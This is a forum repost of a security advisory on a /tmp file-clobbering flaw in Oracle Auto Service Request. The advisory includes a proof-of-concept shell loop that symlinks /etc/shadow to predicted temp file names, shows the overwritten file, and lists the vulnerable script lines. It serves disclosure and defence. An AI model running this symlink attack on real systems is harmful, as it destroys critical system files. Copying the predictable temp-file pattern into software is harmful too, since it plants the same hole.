Jump to content
Kwelwild

Oracle Auto Service Request File Clobber

By Kwelwild, in Exploituri

Recommended Posts

Kwelwild Newbie

Kwelwild

Posted
Posted

Oracle Auto Service Request insecure creates files in /tmp using time stamps allow for root-owned files to be clobbered.

Oracle Auto Service Request  /tmp file clobbering vulnerability

http://www.oracle.com/us/support/systems/premier/auto-service-request-155415.html
http://docs.oracle.com/cd/E18476_01/doc.220/e18478/asr.htm


I noticed it creates files insecurely in /tmp using time stamps instead of mkstemp().  You can clobber root owned files if you know when around the time the root administrator will be using this utility.



[larry@oracle-os-lab01 tmp]$ for x in `seq  500 999`; do ln -s /etc/shadow /tmp/status1_020213003$x; done


root executes the asr command:

[root@oracle-os-lab01 bin]# ./asr

  register OR register [-e asr-manager-relay-url]: register ASR
  unregister : unregister ASR
  show_reg_status : show ASR registration status
  test_connection : test connection to Oracle
.
.
.

  version : show asr script version
  exit
  help : display a list of commands
  ? : display a list of commands


asr> 

/etc/shadow is now overwritten with the contents of /tmp/status1_020213003722
root # cat /etc/shadow

id  State       Bundle
68  ACTIVE      com.sun.svc.asr.sw_4.3.1
              Fragments=69, 70
69  RESOLVED    com.sun.svc.asr.sw-frag_4.3.1
              Master=68
70  RESOLVED    com.sun.svc.asr.sw-rulesdefinitions_4.3.1
              Master=68
72  ACTIVE      com.sun.svc.asr.sw.http.AsrHttpReceiver_1.0.0
              Fragments=73
73  RESOLVED    com.sun.svc.asr.sw.http-frag_1.0.0
              Master=72

67  ACTIVE      com.sun.svc.ServiceActivation_4.3.1



Problem code:  

The asr binary is a wrapper for a java class, the following snippet of code is where the error lies:


/sbin/sh:root@unix-solaris# grep -n tmp asr 
409:    file1=/tmp/status1_`date '+%m%d%y%H%M%S'`
410:    file2=/tmp/status2_`date '+%m%d%y%H%M%S'`
411:    file3=/tmp/status3_`date '+%m%d%y%H%M%S'`
557:            file1=/tmp/status1_`date '+%m%d%y%H%M%S'`
681:        file1=/tmp/status1_`date '+%m%d%y%H%M%S'`
691:        file1=/tmp/status1_`date '+%m%d%y%H%M%S'`
706:    file1=/tmp/parse_jetty_`date '+%m%d%y%H%M%S'`
710:    file2=/tmp/parse_jetty_port_`date '+%m%d%y%H%M%S'`
797:   file1=/tmp/status1_`date '+%m%d%y%H%M%S'`
987:    hostnameTempFile=/tmp/status1_`date '+%m%d%y%H%M%S'`
988:    tempFile=/tmp/status2_`date '+%m%d%y%H%M%S'`
989:    tempHostname=/tmp/status3_`date '+%m%d%y%H%M%S'`        
1303:           file1=/tmp/status1_`date '+%m%d%y%H%M%S'`
1334:    file1=/tmp/status1_`date '+%m%d%y%H%M%S'`
1343:    file1=/tmp/status1_`date '+%m%d%y%H%M%S'`
1344:    file2=/tmp/status2_`date '+%m%d%y%H%M%S'`
1345:    file3=/tmp/status3_`date '+%m%d%y%H%M%S'`
1405:                   tempFile=/tmp/localsnmp_`date '+%m%d%y%H%M%S'`
2198:                           tempFile=/tmp/localsnmp_`date '+%m%d%y%H%M%S'`

This affects the software package on both Solaris and Linux.

Vendor notified about a month ago.
?
@_larry0
Larry W. Cashdollar
http://otiose.dhs.org/

Surs?: Oracle Auto Service Request File Clobber ? Packet Storm

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...